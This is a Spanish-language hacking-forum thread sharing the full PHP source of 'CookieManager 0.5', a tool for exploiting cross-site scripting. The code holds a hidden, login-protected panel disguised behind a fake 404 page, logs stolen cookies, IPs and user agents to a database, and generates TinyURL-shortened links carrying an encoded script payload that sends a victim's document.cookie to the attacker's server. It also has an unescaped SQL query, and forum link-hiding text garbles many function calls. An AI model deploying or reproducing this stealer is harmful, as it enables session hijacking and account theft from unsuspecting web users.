comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[PHP] CookieManager 0.5

  • 1 Respuestas
  • 1283 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Febrero 06, 2015, 02:10:03 pm »
Un simple programa en PHP para ayudar con la vulnerabilidad XSS , en este programa tienen las siguientes opciones :

  • Cookie Stealer con generador de TinyURL
  • Pueden ver los cookies que les devuelve una pagina
  • Pueden crear cookies con los datos que quieran
  • Panel oculto con login para entrar usen ?poraca para encontrar al login


Un video con ejemplos de uso :



El codigo :

Código: PHP
  1. <?php
  2.  
  3. // CookieManager 0.5
  4. // (C) Doddy Hackman 2015
  5.  
  6. //Datos para el login
  7.  
  8. $username = "admin";
  9. $password = "21232f297a57a5a743894a0e4a801fc3"; //admin
  10.  
  11. //
  12.  
  13. //Datos para la DB
  14.  
  15. $host  = "localhost";
  16. $userw = "root";
  17. $passw = "";
  18. $db    = "cookies";
  19.  
  20. //
  21.  
  22.  
  23. // Functions
  24.  
  25. function hex_encode($text)
  26. {
  27.     $texto = You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login($text), 2, '%');
  28.     return $texto = '%' . You are not allowed to view links. Register or Login($texto, 0, You are not allowed to view links. Register or Login($texto) - 1);
  29. }
  30.  
  31. function parsear_cookie($leyendo)
  32. {
  33.    
  34.     $leyendo   = You are not allowed to view links. Register or Login("comment=", "", $leyendo);
  35.     $leyendo   = You are not allowed to view links. Register or Login("Set-Cookie: ", "", $leyendo);
  36.     $contenido = You are not allowed to view links. Register or Login(";", $leyendo);
  37.    
  38.     $nombre       = "";
  39.     $valor_cookie = "";
  40.     $expires      = "";
  41.     $path         = "";
  42.     $domain       = "";
  43.     $secure       = "false";
  44.     $httponly     = "false";
  45.    
  46.     foreach ($contenido as $valor) {
  47.        
  48.         if (You are not allowed to view links. Register or Login("/expires=(.*)/", $valor, $regex)) {
  49.             $expires = $regex[1];
  50.         }
  51.        
  52.         elseif (You are not allowed to view links. Register or Login("/path=(.*)/", $valor, $regex)) {
  53.             $path = $regex[1];
  54.         } elseif (You are not allowed to view links. Register or Login("/domain=(.*)/", $valor, $regex)) {
  55.             $domain = $regex[1];
  56.         } elseif (You are not allowed to view links. Register or Login("/secure=(.*)/", $valor, $regex)) {
  57.             $secure = $regex[1];
  58.         } elseif (You are not allowed to view links. Register or Login("/httponly=(.*)/", $valor, $regex)) {
  59.             $httponly = $regex[1];
  60.         }
  61.        
  62.         else {
  63.            
  64.             if (You are not allowed to view links. Register or Login("/(.*)=(.*)/", $valor, $regex)) {
  65.                 $nombre       = $regex[1];
  66.                 $valor_cookie = $regex[2];
  67.             }
  68.            
  69.         }
  70.        
  71.     }
  72.    
  73.     return You are not allowed to view links. Register or Login(
  74.         $nombre,
  75.         $valor_cookie,
  76.         $expires,
  77.         $path,
  78.         $domain,
  79.         $secure,
  80.         $httponly
  81.     );
  82.    
  83. }
  84.  
  85. function ver_cookies_de_pagina($pagina)
  86. {
  87.     $cookies = "";
  88.     if (!You are not allowed to view links. Register or Login('curl_exec')) {
  89.         $options = You are not allowed to view links. Register or Login(
  90.             'http' => You are not allowed to view links. Register or Login(
  91.                 'user_agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'
  92.             )
  93.         );
  94.         $context = You are not allowed to view links. Register or Login($options);
  95.         You are not allowed to view links. Register or Login($pagina);
  96.         foreach ($http_response_header as $valores) {
  97.             if (You are not allowed to view links. Register or Login("/Set-Cookie/", $valores)) {
  98.                 $valores = You are not allowed to view links. Register or Login("Set-Cookie:", "", $valores);
  99.                 $cookies = $cookies . $valores . "<br>";
  100.             }
  101.         }
  102.     } else {
  103.         $nave = You are not allowed to view links. Register or Login($pagina);
  104.         You are not allowed to view links. Register or Login($nave, CURLOPT_TIMEOUT, 5);
  105.         You are not allowed to view links. Register or Login($nave, CURLOPT_RETURNTRANSFER, 1);
  106.         You are not allowed to view links. Register or Login($nave, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0");
  107.         You are not allowed to view links. Register or Login($nave, CURLOPT_HEADER, 1);
  108.         You are not allowed to view links. Register or Login($nave, CURLOPT_NOBODY, 1);
  109.         $contenido = You are not allowed to view links. Register or Login($nave);
  110.         You are not allowed to view links. Register or Login($nave);
  111.         $leyendo = You are not allowed to view links. Register or Login("\n", You are not allowed to view links. Register or Login($contenido));
  112.        
  113.         foreach ($leyendo as $valores) {
  114.             if (You are not allowed to view links. Register or Login("/Set-Cookie/", $valores)) {
  115.                 $valores = You are not allowed to view links. Register or Login("Set-Cookie:", "", $valores);
  116.                 $cookies = $cookies . $valores . "<br>";
  117.             }
  118.         }
  119.     }
  120.     return $cookies;
  121. }
  122.  
  123. function toma($target)
  124. {
  125.     $code = "";
  126.     if (You are not allowed to view links. Register or Login('curl_exec')) {
  127.         $nave = You are not allowed to view links. Register or Login($target);
  128.         You are not allowed to view links. Register or Login($nave, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0');
  129.         You are not allowed to view links. Register or Login($nave, CURLOPT_TIMEOUT, 5);
  130.         You are not allowed to view links. Register or Login($nave, CURLOPT_RETURNTRANSFER, true);
  131.         $code = You are not allowed to view links. Register or Login($nave);
  132.     } else {
  133.         $options = You are not allowed to view links. Register or Login(
  134.             'http' => You are not allowed to view links. Register or Login(
  135.                 'user_agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'
  136.             )
  137.         );
  138.         $context = You are not allowed to view links. Register or Login($options);
  139.         $code    = You are not allowed to view links. Register or Login($target);
  140.     }
  141.     return $code;
  142. }
  143.  
  144. //
  145.  
  146. You are not allowed to view links. Register or Login(0);
  147.  
  148. You are not allowed to view links. Register or Login($host, $userw, $passw);
  149. You are not allowed to view links. Register or Login($db);
  150.  
  151. if (You are not allowed to view links. Register or Login($_GET['id'])) {
  152.    
  153.     if (You are not allowed to view links. Register or Login($_GET['id'])) {
  154.         error();
  155.     }
  156.    
  157.     $dia = You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login("d.m.Y"));
  158.     $ip  = You are not allowed to view links. Register or Login($_SERVER["REMOTE_ADDR"]);
  159.    
  160.     if ($ip == "::1") {
  161.         $ip = "127.0.0.1";
  162.     }
  163.    
  164.     $info = You are not allowed to view links. Register or Login($_SERVER["HTTP_USER_AGENT"]);
  165.     $ref  = You are not allowed to view links. Register or Login($_SERVER["HTTP_REFERER"]);
  166.    
  167.     $cookie = You are not allowed to view links. Register or Login($_GET['id']);
  168.    
  169.     You are not allowed to view links. Register or Login("INSERT INTO todo(id,fecha,ip,info,cookie) values(NULL,'$dia','$ip','$info','$cookie')");
  170.    
  171.     You are not allowed to view links. Register or Login("Location:http://www.google.com.ar");
  172.    
  173. }
  174.  
  175. elseif (You are not allowed to view links. Register or Login($_COOKIE['portal'])) {
  176.    
  177.     $st = You are not allowed to view links. Register or Login($_COOKIE['portal']);
  178.    
  179.     $plit = You are not allowed to view links. Register or Login("@", $st);
  180.     $user = $plit[0];
  181.     $pass = $plit[1];
  182.    
  183.     if ($user == $username and $pass == $password) {
  184.        
  185.         if (You are not allowed to view links. Register or Login($_POST['makecookies'])) {
  186.             //setcookie($_POST['name_cookie'],$_POST['value_cookie'],$_POST['expire_cookie'],$_POST['path_cookie'],$_POST['domain_cookie'],$_POST['secure_cookie'],$_POST['httponline_cookie'])) {
  187.            
  188.             if (You are not allowed to view links. Register or Login($_POST['name_cookie'], $_POST['value_cookie'], You are not allowed to view links. Register or Login() + 7200, $_POST['path_cookie'], $_POST['domain_cookie'])) {
  189.                 echo "<script>alert('Cookies Maked');</script>";
  190.             } else {
  191.                 echo "<script>alert('Error making Cookie');</script>";
  192.             }
  193.         }
  194.        
  195.         echo "<title>CookieManager 0.3</title>";
  196.        
  197.         echo "<STYLE type=text/css>
  198.  
  199. body,a:link {
  200. background-color: #000000;
  201. color:orange;
  202. Courier New;
  203. cursor:crosshair;
  204. font-size: small;
  205. }
  206.  
  207. input,table.outset,table.bord,table,textarea,select,fieldset,td,tr {
  208. font: normal 10px Verdana, Arial, Helvetica,
  209. sans-serif;
  210. background-color:black;
  211. color:orange;
  212. border: solid 1px orange;
  213. border-color:orange
  214. }
  215.  
  216. a:link,a:visited,a:active {
  217. color: orange;
  218. font: normal 10px Verdana, Arial, Helvetica,
  219. sans-serif;
  220. text-decoration: none;
  221. }
  222.  
  223. </style>
  224. ";
  225.        
  226.         $edit_name       = "";
  227.         $edit_value      = "";
  228.         $edit_expire     = "";
  229.         $edit_path       = "";
  230.         $edit_domain     = "";
  231.         $edit_secure     = "";
  232.         $edit_httponline = "";
  233.        
  234.         if (You are not allowed to view links. Register or Login($_POST['instalar'])) {
  235.            
  236.             $todo = "create table todo (
  237. id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
  238. fecha TEXT NOT NULL,
  239. ip TEXT NOT NULL,
  240. info TEXT NOT NULL,
  241. cookie TEXT NOT NULL,
  242. PRIMARY KEY (id));
  243. ";
  244.            
  245.             if (You are not allowed to view links. Register or Login($todo)) {
  246.                 echo "<script>alert('Installed');</script>";
  247.             } else {
  248.                 echo "<script>alert('Error');</script>";
  249.             }
  250.         }
  251.        
  252.         if (You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login("show tables like 'todo'"))) {
  253.            
  254.             //
  255.            
  256.             if (You are not allowed to view links. Register or Login($_GET['del'])) {
  257.                 if (You are not allowed to view links. Register or Login($_GET['del'])) {
  258.                     if (@You are not allowed to view links. Register or Login("delete from todo where id='" . $_GET['del'] . "'")) {
  259.                         echo "<script>alert('Deleted');</script>";
  260.                     } else {
  261.                         echo "<script>alert('Error');</script>";
  262.                     }
  263.                 }
  264.             }
  265.            
  266.             echo "<center>";
  267.             echo "<br><h1>CookieManager</h1><br>";
  268.            
  269.            
  270.             // Cookies Found
  271.            
  272.            
  273.             $re  = You are not allowed to view links. Register or Login("select * from todo order by id ASC");
  274.             $con = You are not allowed to view links. Register or Login($re);
  275.            
  276.             if ($con == 0) {
  277.                 echo "<script>alert('Cookies not found');</script>";
  278.             } else {
  279.                
  280.                 echo "<table border=1 width=1100><td width=1100><center><h2>Cookies Found : $con</h2></center></table>";
  281.                 echo "<table border=1 width=1100>";
  282.                 echo "<td><b>ID</b></td><td><b>Date</b></td><td><b>IP</b></td><td><b>Data</b></td><td><b>Cookie</b></td><td><b>Name</b></td><td><b>Value</b></td><td><b>Option</b></td><tr>";
  283.                
  284.                 while ($ver = You are not allowed to view links. Register or Login($re)) {
  285.                     $cookies_view = $ver[4];
  286.                     You are not allowed to view links. Register or Login($nombre, $valor_cookie, $expires, $path, $domain, $secure, $httponly) = parsear_cookie($cookies_view);
  287.                    
  288.                     echo "<td>" . You are not allowed to view links. Register or Login($ver[0]) . "</td><td>" . You are not allowed to view links. Register or Login($ver[1]) . "</td><td>" . You are not allowed to view links. Register or Login($ver[2]) . "</td><td>" . You are not allowed to view links. Register or Login($ver[3]) . "</td>";
  289.                     echo "<td>" . You are not allowed to view links. Register or Login($cookies_view) . "</td><td>" . You are not allowed to view links. Register or Login($nombre) . "</td><td>" . You are not allowed to view links. Register or Login($valor_cookie) . "</td><td><a href=?del=" . You are not allowed to view links. Register or Login($ver[0]) . ">Del</a></td><tr>";
  290.                    
  291.                 }
  292.                
  293.                 echo "</table>";
  294.                
  295.             }
  296.            
  297.             //
  298.            
  299.             // Form para target
  300.            
  301.             echo "
  302. <form action='' method=POST>
  303. <center><br><table border=1>
  304. <td><center><h2>Enter Target</h2></center></td><tr>
  305. <td><input type=text size=50 name=target value='http://localhost/dhlabs/xss/index.php?msg='=></td><tr>
  306. <td><input type=submit name=getcookies style='height: 25px; width: 100px' value='Get Cookies'><input type=submit name=generateurl style='height: 25px; width: 100px' value=Generate URL></td>
  307. </table></center>
  308. </form>
  309.  
  310. ";
  311.            
  312.             // URLS
  313.            
  314.             if (You are not allowed to view links. Register or Login($_POST['generateurl'])) {
  315.                 echo "<br><table border=1>
  316. <td><center><h2>URL Generated</h2></center></td><tr>
  317. <td><textarea cols=50 name=code readonly>\n";
  318.                 $script         = hex_encode("<script>document.location='http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?id='+document.cookie;</script>");
  319.                 //echo "http://tinyurl.com/api-create.php?url=".$_POST['target'].$script."\n";
  320.                 $resultado_code = toma("http://tinyurl.com/api-create.php?url=" . $_POST['target'] . $script);
  321.                 echo You are not allowed to view links. Register or Login($resultado_code);
  322.                 echo "\n</textarea></td></table>";
  323.             }
  324.             //
  325.            
  326.             // Get Cookies
  327.            
  328.             if (You are not allowed to view links. Register or Login($_POST['getcookies'])) {
  329.                 echo "<br><table border=1>
  330. <td><center><h2>Console</h2></center></td><tr>
  331. <td><textarea cols=50 rows=10 name=code readonly>\n";
  332.                 $resultado_code = ver_cookies_de_pagina($_POST['target']);
  333.                 echo You are not allowed to view links. Register or Login($resultado_code);
  334.                 echo "\n</textarea></td></table>";
  335.                
  336.                 $leyendo_esto = You are not allowed to view links. Register or Login("\n", $resultado_code);
  337.                
  338.                 You are not allowed to view links. Register or Login($nombre, $valor_cookie, $expires, $path, $domain, $secure, $httponly) = parsear_cookie($leyendo_esto[0]);
  339.                
  340.                 $edit_name       = $nombre;
  341.                 $edit_value      = $valor_cookie;
  342.                 $edit_expire     = $expires;
  343.                 $edit_path       = $path;
  344.                 $edit_domain     = $domain;
  345.                 $edit_secure     = $secure;
  346.                 $edit_httponline = $httponly;
  347.                
  348.             }
  349.            
  350.             //
  351.            
  352.             // Form para crear cookies
  353.            
  354.             echo "
  355. <form action='' method=POST>
  356. <center><br><table border=1>
  357. <td><center><h2>Cookies Maker</h2></center></td><tr>
  358. <td>Name : <input type=text size=50 name=name_cookie value='$edit_name'=></td><tr>
  359. <td>Value : <input type=text size=50 name=value_cookie value='$edit_value'=></td><tr>
  360. <td>Expires : <input type=text size=50 name=expire_cookie value='$edit_expire'=></td><tr>
  361. <td>Path : <input type=text size=50 name=path_cookie value='$edit_path'=></td><tr>
  362. <td>Domain : <input type=text size=50 name=domain_cookie value='$edit_domain'=></td><tr>
  363. <td>Secure : <input type=text size=50 name=secure_cookie value='$edit_secure'=></td><tr>
  364. <td>HTTP Online : <input type=text size=50 name=httponline_cookie value='$edit_httponline'=></td><tr>
  365. <td><input type=submit name=makecookies style='height: 25px; width: 100px' value='Make Cookies'></td>
  366. </table></center>
  367. </form>";
  368.            
  369.             //
  370.            
  371.             //
  372.            
  373.             echo "<br><h1>(C) Doddy Hackman 2015</h1><br><br>";
  374.            
  375.             //
  376.            
  377.         } else {
  378.             echo "
  379. <center><br><br>
  380. <form action='' method=POST>
  381. <h2>Deseas instalar CookieManager ?</h2><br><br>
  382. <input type=submit name=instalar value=Instalar>
  383. </form>";
  384.         }
  385.         You are not allowed to view links. Register or Login(1);
  386.     }
  387. } elseif (You are not allowed to view links. Register or Login($_POST['login'])) {
  388.     if ($_POST['user'] == $username and You are not allowed to view links. Register or Login($_POST['password']) == $password) {
  389.         You are not allowed to view links. Register or Login("portal", You are not allowed to view links. Register or Login($_POST['user'] . "@" . You are not allowed to view links. Register or Login($_POST['password'])));
  390.         echo "<script>alert('Welcome idiot');</script>";
  391.         echo '<meta http-equiv="refresh" content=0;URL=>';
  392.     } else {
  393.         echo "<script>alert('Continued to participate');</script>";
  394.     }
  395. } elseif (You are not allowed to view links. Register or Login($_GET['poraca'])) {
  396.    
  397.     echo "
  398.  
  399. <STYLE type='text/css'>
  400.  
  401. body,input {
  402. background-color: #000000;
  403. color:orange;
  404. font-family:
  405. Courier New;
  406. cursor:crosshair;
  407. font-size: small;
  408. }
  409. </style>
  410.  
  411. <h1><br><center><font color=green>Login</font></center></h1>
  412. <br><br><center>
  413. <form action='' method=POST>
  414. Username : <input type=text name=user><br>
  415. Password : <input type=password name=password><br><br>
  416. <input type=submit name=login value=Enter><br>
  417. </form>
  418. </center><br><br>";
  419. } else {
  420.    
  421.     error();
  422.    
  423. }
  424.  
  425. function error()
  426. {
  427.     echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  428. <html><head>
  429. <title>404 Not Found</title>
  430. </head><body>
  431. <h1>Not Found</h1>
  432. <p>The requested URL was not found on this server.</p>
  433. </body></html>';
  434.     You are not allowed to view links. Register or Login(1);
  435. }
  436.  
  437.  
  438. You are not allowed to view links. Register or Login();
  439.  
  440. // The End ?
  441.  
  442.  
  443. ?>
  444.  

Si quieren bajar el programa lo pueden hacer de aca :

You are not allowed to view links. Register or Login.
You are not allowed to view links. Register or Login.

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1893
  • Actividad:
    16.67%
  • Reputación 14
    • Ver Perfil
« Respuesta #1 en: Febrero 07, 2015, 08:48:17 am »
Estará bien tener un "gestor" para no recogerlo en el típico txt jajaja

Como siempre, muy bueno Doddy ^^



 

¿Te gustó el post? COMPARTILO!